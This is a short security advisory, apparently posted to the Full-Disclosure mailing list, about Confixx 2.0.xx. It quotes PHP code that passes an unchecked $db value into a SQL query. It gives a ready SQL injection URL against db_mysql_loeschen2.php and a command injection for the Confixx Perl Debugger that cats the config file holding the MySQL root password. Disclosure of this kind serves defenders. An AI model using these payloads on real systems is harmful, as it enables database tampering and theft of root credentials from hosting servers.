Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW

[checker () mail krefeld schulen net]

SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW


include("auth.php");

db_connect($db_host, $db_user, $db_pass);

$id = db_query("select count(datenbank) as mysql from mysql_datenbanken
where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];

$id = db_query("select dbname from mysql_datenbanken where kunde =
'$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^

$db --> unchecked Value

____


/user/db_mysql_loeschen2.php?db=1


SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'

using: ' or 1 or 1='

the SQL query look like :

SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''


/user/db_mysql_loeschen2.php?db=' or 1 or 1='



______

Confixx Perl Debugger

using:

 ; /bin/cat location_of_Confixx_config_file


to read the config with MySQL Root-PW

_______


wkr

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html